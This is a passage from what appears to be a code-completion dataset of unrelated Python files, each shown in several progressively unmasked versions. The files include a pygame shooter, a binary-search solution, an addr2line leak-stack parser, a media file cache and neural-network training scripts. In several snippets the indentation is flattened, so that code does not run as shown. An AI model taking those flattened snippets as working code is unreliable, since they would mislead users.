sin = oppos/hypot
radians = math.asin(sin)
angle = radians * (180/3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr,self.color,pygame.Rect(self.x,self.y,5,5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self,x,y,angle):
self.bullets.append(Bullet((0,255,255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self,x,y,angle):
self.bullets2.append(Bullet((255,255,0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image,(self.x,self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos,adjac)
sin = oppos/hypot
radians = math.asin(sin)
angle = radians * (180/3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self,x,y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos,adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0,600)
enemies[-1].y = random.randint(0,600)
cmd = Enemy()
gun = Gun()
player = Player()
cmd.spawn()
cmd.spawn()
last = 0
frames = 0
fro = 1
angle = 0  # default facing, so a click during the very first event poll cannot hit an undefined name
while True:
frames += 1
scr.fill((0,0,0))
for event in pygame.event.get():
key = pygame.key.get_pressed()
Mpos = pygame.mouse.get_pos()
if event.type == 5:
gun.shoot1(player.x + 12.5,player.y + 12.5,angle)
for i in range(0,player.lives):
scr.blit(player.image1,(i*35,1))
for i in range(len(gun.bullets)):
try:
gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians(gun.bullets[i].angle + 90))
gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians(gun.bullets[i].angle - 90))
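            # editor's note: with angle = (true heading - 90), cos(angle + 90)
            # and sin(angle - 90) equal cos/-sin of the heading, i.e. a 4 px
            # step toward the target in screen coordinates (y grows downward)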
if gun.bullets[i].x > 600:
del gun.bullets[i]
if gun.bullets[i].x < 0:
del gun.bullets[i]
if gun.bullets[i].y > 600:
del gun.bullets[i]
if gun.bullets[i].y < 0:
del gun.bullets[i]
gun.bullets[i].draw()
except IndexError:
pass
for i in range(len(gun.bullets2)):
try:
gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.radians(gun.bullets2[i].angle + 90))
gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.radians(gun.bullets2[i].angle - 90))
if gun.bullets2[i].x > 600:
del gun.bullets2[i]
if gun.bullets2[i].x < 0:
del gun.bullets2[i]
if gun.bullets2[i].y > 600:
del gun.bullets2[i]
if gun.bullets2[i].y < 0:
del gun.bullets2[i]
gun.bullets2[i].draw()
except IndexError:
pass
for i in range(len(enemies)):
if enemies[i].distance(player.x,player.y) > 100:
enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.radians(enemies[i].rotate(player.x,player.y) + 90))
enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.radians(enemies[i].rotate(player.x,player.y) - 90))
enemies[i].image = pygame.image.load("enemy.png").convert()
enemies[i].image = enemies[i].image.copy()
enemies[i].image = pygame.transform.rotate(enemies[i].image,enemies[i].rotate(player.x,player.y))
angle2 = enemies[i].rotate(player.x,player.y)
if frames % 100 == 0:
gun.shoot2(enemies[i].x + 12.5,enemies[i].y + 12.5,angle2)
enemies[i].draw()
for j in range(len(gun.bullets)):
        for i in range(len(enemies)):
try:
if gun.bullets[j].x > enemies[i].x and gun.bullets[j].x < enemies[i].x+25 and gun.bullets[j].y > enemies[i].y and gun.bullets[j].y < enemies[i].y + 25:
del enemies[i]
except IndexError:
pass
for j in range(len(gun.bullets2)):
for i in range(len(gun.bullets2)):
try:
if gun.bullets2[j].x > player.x and gun.bullets2[j].x < player.x+25 and gun.bullets2[j].y > player.y and gun.bullets2[j].y < player.y + 25:
for i in range(len(hit)-1):
if not (hit[i].x > player.x or hit[i].x < player.x+25 or hit[i].y > player.y or hit[i].y < player.y):
del hit[i]
if hit.count(gun.bullets2[j]) == 0:
hit.append(gun.bullets2[j])
player.lives = 5 - len(hit)
except IndexError:
pass
if key[pygame.K_a]:
player.x -= 3
if key[pygame.K_d]:
player.x += 3
if key[pygame.K_w]:
player.y -= 3
if key[pygame.K_s]:
player.y += 3
if frames % 150 == 0:
cmd.spawn()
if player.lives < 1:
pygame.quit()
break
player.image = pygame.image.load("player.jpg").convert()
player.image = player.image.copy()
player.image = pygame.transform.rotate(player.image,player.rotate(Mpos[0],Mpos[1]))
angle = player.rotate(Mpos[0],Mpos[1])
player.draw()
pygame.display.update()
time.sleep(0.005)
quit()
| [
14,
15,
18,
19,
21
] |
12 | 0a7ffc027511d5fbec0076f6b25a6e3bc3dfdd9b | '''
Given a sorted array and a target value, return the index if the target is found.
If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array.
Here are few examples.
[1,3,5,6], 5 -> 2
[1,3,5,6], 2 -> 1
[1,3,5,6], 7 -> 4
[1,3,5,6], 0 -> 0
'''
class Solution(object):
def searchInsert(self, nums, target):
if target < nums[0]:
return 0
if target > nums[-1]:
return len(nums)
l_idx, h_idx = 0, len(nums)-1
while True:
m_idx = int((l_idx+h_idx)/2)
if l_idx >= h_idx:
return l_idx
elif target > nums[m_idx]:
l_idx = m_idx + 1
else:
h_idx = m_idx
sol = Solution()
print sol.searchInsert([1,3,5,6], 5)
print sol.searchInsert([1,3,5,6], 2)
print sol.searchInsert([1,3,5,6], 4)
print sol.searchInsert([1,3,5,6], 0)
| null | null | null | null | [
0
] |
13 | 2cbce618d1ec617d1c7dc0e9792b6a49361ec5a4 | <mask token>
| def mais_populoso(dic):
    sp = 0
    for t, i in dic.items():
        p = 0  # reset the running total for each key
        for m in dic[t].values():
            p += m
if p > sp:
sp = p
x = t
return x
| def mais_populoso(dic):
    sp=0
    for t,i in dic.items():
        p=0
        for m in dic[t].values():
            p+=m
if p>sp:
sp=p
x=t
return x | null | null | [
0,
1,
2
] |
14 | 2092ead8b8f268a22711b8af8052241c1ac00c15 | <mask token>
| <mask token>
print('In %d hour(s), earned %d %s.' % (1, wage * 1, 'dollars'))
print('In %d hour(s), earned %d %s.' % (5, wage * 5, 'dollars'))
print('In %d hour(s), earned %.1f %s' % (1, 5710.8, 'won'))
print('In %d hour(s), earned %.1f %s' % (5, 28554.0, 'won'))
| wage = 5
print('In %d hour(s), earned %d %s.' % (1, wage * 1, 'dollars'))
print('In %d hour(s), earned %d %s.' % (5, wage * 5, 'dollars'))
print('In %d hour(s), earned %.1f %s' % (1, 5710.8, 'won'))
print('In %d hour(s), earned %.1f %s' % (5, 28554.0, 'won'))
|
wage=5
print("In %d hour(s), earned %d %s." %(1, wage*1, "dollars"))
print("In %d hour(s), earned %d %s." %(5, wage*5, "dollars"))
print("In %d hour(s), earned %.1f %s" %(1,5710.8,"won"))
print("In %d hour(s), earned %.1f %s" %(5, 28554.0, "won"))
| null | [
0,
1,
2,
3
] |
15 | b5cbb73c152dd60e9063d5a19f6182e2264fec6d | #!/usr/bin/python
# coding=UTF-8
import sys
import subprocess
import os
def printReportTail(reportHtmlFile):
reportHtmlFile.write("""
</body>
</html>
""")
def printReportHead(reportHtmlFile):
reportHtmlFile.write("""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
""")
def printTitle(reportHtmlFile, title):
reportHtmlFile.write("<h2>" + title + "</h2>\n")
def printText(reportHtmlFile, text):
reportHtmlFile.write("<h4>" + text + "</h4>\n")
def printSVG(reportHtmlFile, svgPath):
reportHtmlFile.write('<embed src="')
reportHtmlFile.write(svgPath)
reportHtmlFile.write('" type="image/svg+xml" />')
def ParseStack(currentPath, ndkPath, stackFile, architecture, symbolsDir):
print "currentPath: " + currentPath
    # locate the addr2line executable
print "architecture is " + architecture
if architecture == "arm64-v8a":
addr2line = ndkPath + "/toolchains/aarch64-linux-android-4.9/prebuilt/darwin-x86_64/bin/aarch64-linux-android-addr2line"
elif architecture == "armeabi" or architecture == "armeabi-v7a":
addr2line = ndkPath + "/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-addr2line"
else:
print "do not support architecture type for " + architecture
print "only support armeabi/armeabi-v7a/arm64-v8a"
return
print "addr2line path: " + addr2line
if not os.path.exists(addr2line):
print "can not find " + architecture + " addr2line"
else:
print "find " + architecture + " addr2line"
reportHtmlPath = os.path.split(stackFile)[0] + "/leakReport.html"
if os.path.exists(reportHtmlPath):
os.unlink(reportHtmlPath)
reportHtmlFile = open(reportHtmlPath, "a")
printReportHead(reportHtmlFile)
    # process the stack file
for line in open(stackFile):
if line.startswith("libName:"):
libName = line.replace("libName:", "").replace('\n', '').replace('\r', '')
printTitle(reportHtmlFile, libName)
libAbsolutePath = os.path.split(stackFile)[0] + "/" + libName
if not os.path.exists(libAbsolutePath):
os.makedirs(libAbsolutePath)
flStackFilePath = libAbsolutePath + "/fl_stack.txt"
flameGraphFile = open(flStackFilePath, "w")
print "find lib: " + libName
elif line.startswith("leakSize:"):
leakSize = line.replace("leakSize:", "").replace('\n', '').replace('\r', '')
leakMsg = "leak size: " + leakSize + "\n"
printText(reportHtmlFile, leakMsg)
print leakMsg
elif line.startswith("stack:"):
stack = line.replace("stack:", "").replace('\n', '').replace('\r', '')
# print "stack: "
for stackElement in stack.split("^"):
if stackElement == "":
continue
dlinfo = stackElement.split("|")
pc = dlinfo[0]
libPath = dlinfo[1]
symbol = dlinfo[2]
# print "pc " + pc + " " + libPath + " " + symbol
symbolFile = symbolsDir + "/" + os.path.split(libPath)[1]
if os.path.exists(symbolFile):
# print "---------"
parseCommend = addr2line + " -Ce " + symbolFile + " -f " + pc
# print parseCommend
# os.system(parseCommend)
result = os.popen(parseCommend)
res = result.read()
retraces = res.splitlines()
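                    # addr2line -C -e <symbols> -f <pc> emits two lines:
                    # the demangled function name, then "source_file:line"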
if len(retraces) != 2 or "?" in retraces[0] or "?" in retraces[1]:
if symbol != "":
method = symbol
codeLine = -1
else:
method = pc
codeLine = -1
else:
method = retraces[0]
codeLine = retraces[1]
# print method
# print codeLine
elif symbol != "":
method = symbol
codeLine = -1
else:
method = pc
codeLine = -1
flameGraphFile.write(method + ";")
flameGraphFile.write(" 1\n")
elif line.replace('\n', '').replace('\r', '') == "libSplit!!!":
            # finished one lib's output block
print "finish lib " + libName + " parse"
plExePath = os.path.split(currentPath)[0] + "/flamegraph.pl"
svgPath = libAbsolutePath + "/" + libName + ".svg"
commend = plExePath + " " + flStackFilePath + " > " + svgPath
os.system(commend)
printSVG(reportHtmlFile, svgPath.replace(os.path.split(libAbsolutePath)[0], "./"))
printReportTail(reportHtmlFile)
def main(args):
    if 5 > len(args):
        print("Please provide \"android ndk path\" \"stack file path\" \"arm architecture (armeabi/armeabi-v7a/arm64-v8a)\" \"directory containing the symbolized .so files\"")
return
ParseStack(args[0], args[1], args[2], args[3], args[4])
if __name__ == "__main__":
main(sys.argv)
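# Hypothetical invocation (script name and paths below are placeholders, not from the source):
# python parse_stack.py ~/android-ndk leak_stack.txt arm64-v8a ./symbols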
| null | null | null | null | [
0
] |
16 | 805fc9a26650f85227d14da972311ffbd9dbd555 | <mask token>
| class Date:
<mask token>
| class Date:
def __init__(self, strDate):
strDate = strDate.split('.')
self.day = strDate[0]
self.month = strDate[1]
self.year = strDate[2]
| class Date:
def __init__(self, strDate):
strDate = strDate.split('.')
self.day = strDate[0]
self.month = strDate[1]
self.year = strDate[2]
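# A hypothetical usage sketch (assumption: input arrives as a 'DD.MM.YYYY' string):
# d = Date('25.12.2023')
# d.day, d.month, d.year  ->  ('25', '12', '2023')   # note: the fields stay strings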
| null | [
0,
1,
2,
3
] |
17 | a7218971b831e2cfda9a035eddb350ecf1cdf938 | #!/usr/bin/python
# encoding: utf-8
#
# In case of reuse of this source code please do not remove this copyright.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For more information on the GNU General Public License see:
# <http://www.gnu.org/licenses/>.
#
from Components.config import config
from datetime import datetime
import os
MinCacheLimit = config.EMC.min_file_cache_limit.getValue()
pathisfile = os.path.isfile
pathisdir = os.path.isdir
pathislink = os.path.islink
pathexists = os.path.exists
pathreal = os.path.realpath
idx_isLink=0
idx_isDir=1
idx_isFile=2
idx_Date=3
idx_realpath=4
idx_num=5
class EMCFileCache():
def __init__(self):
self.cacheDirectoryList = {}
self.cacheFileList = {}
self.cacheAttributeList = {}
self.cacheCountSizeList = {}
def addCountSizeToCache(self, path, count, size):
# print "EMC addCountSizeToCache", path
if self.cacheCountSizeList.has_key(path):
lastcount, lastsize = self.cacheCountSizeList[path]
if lastcount != count or lastsize != size:
del self.cacheCountSizeList[path]
self.cacheCountSizeList[path] = count, size
else:
self.cacheCountSizeList[path] = count, size
# print "EMC addCountSizeToCache", self.cacheCountSizeList
def getCountSizeFromCache(self, path):
if self.cacheCountSizeList.has_key(path):
return self.cacheCountSizeList[path]
else:
return None
# print "EMC getCountSizeFromCache", self.cacheCountSizeList
def delcacheCountSizeList(self):
self.cacheCountSizeList = {}
print "EMC delete cacheCountSizeList", self.cacheCountSizeList
def delcacheCountSizeListEntriesOnFileOp(self,path):
#print "EMC delcacheCountSizeListEntriesOnFileOp",path
rescanPaths = []
if path:
for k in self.cacheCountSizeList.keys():
if (k+"/").startswith(path+"/") or (path+"/").startswith(k+"/"): # drop dirs containing path, but not "a/bc" when path is "a/bcd/e", therefore append "/"
del self.cacheCountSizeList[k]
rescanPaths.append(k)
#print "EMC delcacheCountSizeListEntriesOnFileOp IS deleting",k," due to OP on path ",path
#else:
#print "EMC delcacheCountSizeListEntriesOnFileOp NOT deleting",k," due to OP on path ",path
return rescanPaths
def IsPathInCountSizeList(self, path):
if self.cacheCountSizeList.has_key(path):
return True
else:
return False
def addPathToCache(self, path, subdirlist, filelist, MovieCenterInst):
if config.EMC.files_cache.value:
print "EMC addPathToCache", path
if (len(subdirlist)>MinCacheLimit) or (len(filelist)>MinCacheLimit):
self.cacheDirectoryList[path] = subdirlist
for p, n, e in subdirlist:
if not (p in self.cacheAttributeList):
AttributeList=[None]*idx_num
AttributeList[idx_isLink] = pathislink(p)
AttributeList[idx_isDir] = True # we are in subdirlist
AttributeList[idx_isFile] = False # we are in subdirlist
AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, True)
AttributeList[idx_realpath] = pathreal(p) #for dirs only
self.cacheAttributeList[p] = AttributeList
self.cacheFileList[path] = filelist
for p, n, e in filelist:
if not (p in self.cacheAttributeList):
AttributeList=[None]*idx_num
AttributeList[idx_isLink] = pathislink(p)
					AttributeList[idx_isDir] = False # we are in filelist, no entry is a real directory ...
AttributeList[idx_isFile] = pathisfile(p) # ... but filelist might contain virtual directories
AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, False)
#AttributeList[idx_realpath] = pathreal(p) #for dirs only
self.cacheAttributeList[p] = AttributeList
else:
if self.cacheDirectoryList.has_key(path):
self.deleteAssociatedListEntries(self.cacheDirectoryList[path])
del self.cacheDirectoryList[path]
if self.cacheFileList.has_key(path):
self.deleteAssociatedListEntries(self.cacheFileList[path])
del self.cacheFileList[path]
# self.debugPrintDirCache()
# self.debugPrintFileCache()
# self.debugPrintFileAttributeCache()
def addRecToCacheFileList(self, path, rec):
if config.EMC.files_cache.value:
if self.cacheFileList.has_key(path):
filelist = self.cacheFileList[path]
filelist.append(rec)
del self.cacheFileList[path]
self.cacheFileList[path] = filelist
def getCacheForPath(self, path):
print "EMC getCacheForPath", path
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):
subdirlist = self.cacheDirectoryList[path]
filelist = self.cacheFileList[path]
# self.debugPrintDirCache()
# self.debugPrintFileCache()
# self.debugPrintFileAttributeCache()
return subdirlist, filelist
else:
return None, None
def isLink(self, path):
isLink = None
if config.EMC.files_cache.value and (path in self.cacheAttributeList):
isLink = self.cacheAttributeList[path][idx_isLink]
if isLink is None:
isLink = pathislink(path)
return isLink
def isDir(self, path):
isDir = None
if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList):
isDir = self.cacheAttributeList[path][idx_isDir]
if isDir is None:
isDir = pathisdir(path)
return isDir
def isFile(self, path):
isFile = None
if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList):
isFile = self.cacheAttributeList[path][idx_isFile]
if isFile is None:
isFile = pathisfile(path)
return isFile
def realpath(self, path):
realpath = None
if config.EMC.files_cache.value and (path in self.cacheAttributeList):
realpath = self.cacheAttributeList[path][idx_realpath]
if realpath is None:
realpath = pathreal(path)
return realpath
def getDateInfoFromCacheForPath(self, path):
if config.EMC.files_cache.value and (path in self.cacheAttributeList):
return self.cacheAttributeList[path][idx_Date]
else:
return None
def getDirsFromCacheForPath(self, path):
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):
subdirlist = self.cacheDirectoryList[path]
return subdirlist
else:
return None
def getFilesFromCacheForPath(self, path):
if config.EMC.files_cache.value and self.cacheFileList.has_key(path):
filelist = self.cacheFileList[path]
return filelist
else:
return None
def IsPathInCache(self, path):
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):
return True
else:
return False
def IsPathWithDirsInCache(self, path):
if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path):
return True
else:
return False
def IsPathWithFilesInCache(self, path):
if config.EMC.files_cache.value and self.cacheFileList.has_key(path):
return True
else:
return False
def delPathFromCache(self, path):
if len(path)>1 and path[-1]=="/":
path = path[:-1]
print "EMC delPathFromCache", path
if self.cacheDirectoryList.has_key(path):
self.deleteAssociatedListEntries(self.cacheDirectoryList[path])
del self.cacheDirectoryList[path]
if self.cacheFileList.has_key(path):
self.deleteAssociatedListEntries(self.cacheFileList[path])
del self.cacheFileList[path]
# self.debugPrintDirCache()
# self.debugPrintFileCache()
# self.debugPrintFileAttributeCache()
def delPathFromDirCache(self, path):
if len(path)>1 and path[-1]=="/":
path = path[:-1]
if self.cacheDirectoryList.has_key(path):
self.deleteAssociatedListEntries(self.cacheDirectoryList[path])
del self.cacheDirectoryList[path]
def delPathFromFileCache(self, path):
if len(path)>1 and path[-1]=="/":
path = path[:-1]
if self.cacheFileList.has_key(path):
self.deleteAssociatedListEntries(self.cacheFileList[path])
del self.cacheFileList[path]
def debugPrintFileCache(self):
print "cacheFileList:"
for p in self.cacheFileList:
print p,self.cacheFileList[p]
print ""
def debugPrintDirCache(self):
print "cacheDirectoryList:"
for p in self.cacheDirectoryList:
print p,self.cacheDirectoryList[p]
print ""
def debugPrintFileAttributeCache(self):
print "cacheAttributeList:"
for p in self.cacheAttributeList:
print p,self.cacheAttributeList[p]
print ""
def deleteAssociatedListEntries(self, list):
for p, n, e in list:
if p in self.cacheAttributeList and (config.EMC.check_dead_links.value != "only_initially"):
del self.cacheAttributeList[p]
movieFileCache = EMCFileCache()
| null | null | null | null | [
0
] |
18 | 038ccba05113fb7f2f589eaa7345df53cb59a5af | <mask token>
| <mask token>
def train(num_epochs=30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence[
'targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss,
running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,
time_elapsed % 60), file=sys.stderr)
    print('Best val F: {}'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
<mask token>
| <mask token>
config.add_option('-m', '--mode', dest='mode', default='train', type=
'string', help='[train|eval|pred]', action='store')
config.add_option('--seed', dest='seed', default=1, type='int', help=
'torch random seed', action='store')
def train(num_epochs=30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence[
'targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss,
running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,
time_elapsed % 60), file=sys.stderr)
    print('Best val F: {}'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
if __name__ == '__main__':
config.parse_args()
torch.manual_seed(config.get_option('seed'))
mode = config.get_option('mode')
if mode == 'train':
train()
else:
        raise NotImplementedError()
| import sys
import torch
from torch import nn, autograd
import config
import time
import copy
import progressbar as pb
from dataset import TrainDataSet
from model import BiAffineSrlModel
from fscore import FScore
config.add_option('-m', '--mode', dest='mode', default='train', type=
'string', help='[train|eval|pred]', action='store')
config.add_option('--seed', dest='seed', default=1, type='int', help=
'torch random seed', action='store')
def train(num_epochs=30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence[
'targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss,
running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60,
time_elapsed % 60), file=sys.stderr)
    print('Best val F: {}'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
if __name__ == '__main__':
config.parse_args()
torch.manual_seed(config.get_option('seed'))
mode = config.get_option('mode')
if mode == 'train':
train()
else:
        raise NotImplementedError()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import torch
from torch import nn, autograd
import config
import time
import copy
import progressbar as pb
from dataset import TrainDataSet
from model import BiAffineSrlModel
from fscore import FScore
config.add_option('-m', '--mode', dest='mode', default='train', type='string', help='[train|eval|pred]', action='store')
config.add_option('--seed', dest='seed', default=1, type='int', help='torch random seed', action='store')
def train(num_epochs = 30):
lossfunction = nn.CrossEntropyLoss()
trainset = TrainDataSet()
model = BiAffineSrlModel(vocabs=trainset.vocabs)
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_f = FScore()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1), file=sys.stderr)
print('-' * 10, file=sys.stderr)
for phase in ['train', 'dev']:
model.train(phase == 'train')
running_loss = 0.0
running_f = FScore()
for sentence in pb.progressbar(trainset.get_set(phase)):
model.zero_grad()
role_p = model(*sentence['inputs'])
_, predict = torch.max(role_p, 1)
loss = lossfunction(role_p, autograd.Variable(sentence['targets'][0]))
if phase == 'train':
loss.backward()
optimizer.step()
if epoch > 28:
print(predict.data)
print(sentence['targets'][0])
running_loss += loss.data[0]
running_f.update(predict, sentence['targets'][0])
print('\n{} Loss: {:.4f} {}'.format(phase, running_loss, running_f), file=sys.stderr)
if phase == 'dev' and running_f > best_f:
best_f = running_f
best_model_wts = copy.deepcopy(model.state_dict())
print('', file=sys.stderr)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60), file=sys.stderr)
    print('Best val F: {}'.format(best_f), file=sys.stderr)
model.load_state_dict(best_model_wts)
return model
if __name__ == '__main__':
config.parse_args()
torch.manual_seed(config.get_option('seed'))
mode = config.get_option('mode')
if mode == 'train':
train()
else:
        raise NotImplementedError()
| [
0,
1,
2,
3,
4
] |
19 | b5180a2dbe1f12e1bbc92874c67ea99c9a84a9ed | <mask token>
| <mask token>
for card in cards:
try:
number = int(card)
if number % 2 == 0:
print(card, 'is an even card.')
except ValueError:
print(card, 'can not be divided')
| cards = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']
for card in cards:
try:
number = int(card)
if number % 2 == 0:
print(card, 'is an even card.')
except ValueError:
print(card, 'can not be divided')
|
# print all cards with even numbers.
cards = ["2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A"]
for card in cards:
try:
number = int(card)
if number % 2 == 0: # modulo operator
print(card, "is an even card.")
except ValueError:
print (card, "can not be divided")
| null | [
0,
1,
2,
3
] |
20 | a045423edd94d985dfc9660bcfe4a88c61bf4574 | #Script start
print"This is the two number subtraction python program."
a = 9
b = 2
c = a - b
print c
# Script close
| null | null | null | null | [
0
] |
21 | 13c9f0f58ec6da317c3802f594bb0db7c275dee9 | <mask token>
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
<mask token>
| <mask token>
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
for img in os.listdir(path):
img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_COLOR)
plt.imshow(img_array, cmap='gray')
plt.show()
print(img_array)
print(img_array.shape)
break
break
<mask token>
plt.imshow(resized_img_array, cmap='gray')
plt.show()
<mask token>
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR, category)
classIndex = CATEGORIES.index(category)
for img in os.listdir(path):
try:
img_array = cv2.imread(os.path.join(path, img), cv2.
IMREAD_COLOR)
resized_img_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))
training_data.append([resized_img_array, classIndex])
except Exception as e:
pass
create_training_data()
print(len(training_data))
<mask token>
random.shuffle(training_data)
<mask token>
for features, label in training_data:
x.append(features)
y.append(label)
<mask token>
pickle.dump(x, pickle_out)
pickle_out.close()
<mask token>
pickle.dump(y, pickle_out)
pickle_out.close()
<mask token>
for dense_layer in dense_layers:
for layer_size in layer_sizes:
for conv_layer in conv_layers:
NAME = '{}-conv-{}-nodes-{}-dense-{}'.format(conv_layer,
layer_size, dense_layer, int(time.time()))
print(NAME)
model = Sequential()
model.add(Conv2D(layer_size, (3, 3), input_shape=INPUT_SHAPE))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
for l in range(conv_layer - 1):
model.add(Conv2D(layer_size, (5, 5)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(DROPOUT))
model.add(Flatten())
for _ in range(dense_layer):
model.add(Dense(layer_size))
model.add(Activation('relu'))
